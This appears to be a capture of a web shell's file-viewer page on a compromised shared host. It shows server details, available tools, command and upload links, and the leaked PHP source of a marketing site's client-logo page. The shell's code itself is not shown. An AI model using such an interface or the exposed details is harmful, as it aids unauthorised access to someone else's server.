Server IP : 103.53.40.154 / Your IP : 18.225.195.153 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/brmarketingindia.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include("site-header.php");?> <!-- CONTENT --> <!-- Intro Section --> <?php include("site-header-flash-inner.php");?> <!-- Intro Section --> <!-- Service Section --> <div id="services-section" class="pt-80 pt-xs-60"> <div class="container"> <div class="row"> <div class="col-sm-12"> <?php $sql_logos=db_query("select * from tbl_client_logo where 1 order by client_logo_id asc"); if(mysqli_num_rows($sql_logos) >0){ while($LOGO_DATA=mysqli_fetch_array($sql_logos)){ @extract($LOGO_DATA); ?> <div class="col-sm-2" style="margin-bottom:35px;"> <a data-lightbox="example-1" href="<?=$site_url?>/client_logo/<?=$LOGO_DATA['client_logo_image_name']?>"> <img src="<?=$site_url?>/client_logo/<?=$LOGO_DATA['client_logo_image_name']?>" alt="Client Logo" title="Client Logo" style="width:100%; height:150px;"></a> </div> <?php } } ?> </div> </div> </div> </div> <!-- Service Section end --> <?php include("site-footer.php");?>